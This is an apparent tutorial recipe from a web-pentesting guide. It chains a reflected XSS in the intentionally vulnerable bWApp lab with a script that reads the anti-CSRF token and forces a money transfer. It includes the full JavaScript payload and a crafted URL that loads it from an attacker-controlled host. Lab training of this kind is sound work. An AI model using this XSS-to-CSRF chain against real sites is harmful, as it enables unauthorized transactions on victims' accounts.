For this recipe, we will use the bWApp application in bee-box, http://192.168.56.13/bWapp in this example, and we will set the security level to Medium.

1. Once logged in to bWApp, go to the bug Cross Site Request Forgery (Transfer Amount).
2. Enter an account number and amount and click on the Transfer button.
3. Let's analyze the following request in Burp Suite. All of the parameters are sent via a GET request; by looking at the token parameter included in the URL, we can infer that there is a CSRF protection in place:

4. We will try and exploit an XSS and use it to trigger the transfer request. For that, we first need to find the place where the token is stored in the client side so that we can retrieve it. Go to the response and look for an input tag with the name token, and take note of the id parameter as well. The following screenshot shows that it is a hidden parameter of the form:

5. Next, we will need to prove that there is an exploitable XSS in place, so go to the bug XSS-Reflected (GET) and try to exploit it. As demonstrated in the following screenshot, it is exploitable:

6. We will use that XSS vulnerability to include a JavaScript file hosted in a server we control, our Kali Linux VM in this exercise. Create a forcetransfer.js file with the following code in it:

xmlhttp=new XMLHttpRequest();
xmlhttp.open("GET","http://192.168.56.13/bWAPP/csrf_2.php", true);
xmlhttp.onreadystatechange=function() 
{
  if(xmlhttp.readyState==4 && xmlhttp.status == 200 )
  {
    var parser = new DOMParser();

    var responseDoc = parser.parseFromString (xmlhttp.responseText, "text/html");

    var token=responseDoc.getElementById('token').value;
    var URL="http://192.168.56.13/bWAPP/csrf_2.php?account=123-45678-90&amount=100&token=" + token + "&action=transfer"
    
    xmlhttp2=new XMLHttpRequest();
    xmlhttp2.open("GET",URL, true);
    xmlhttp2.send();
  }
}
xmlhttp.send();

7. Start the Apache web server in Kali Linux and move the file to the web root (the default is /var/www/html).
8. Now, exploit the XSS setting with the malicious file as source of the script tag. While logged in to bWApp, in a new tab, navigate to http://192.168.56.13/bWAPP/xss_get.php?firstname=test%3Cscript+src%3Dhttp%3A%2F%2F192.168.56.10%2Fforce-transfer.js%3E%3C%2Fscript%3E&lastname=asd&form=submit. The XSS payload is in bold.
9. The script will load and execute successfully. To take a look at what actually happened, look at the Burp Suite's Proxy history shown in the next screenshot:

First, the XSS attack is made, then our malicious file forcetransfer.js is loaded, and this makes the call to csrf_2.php, without parameters. This is where our scripts gets the anti-CSRF token to use it to send a new request to csrf_2.php but this time with all the necessary parameters to make a transfer, and this succeeds.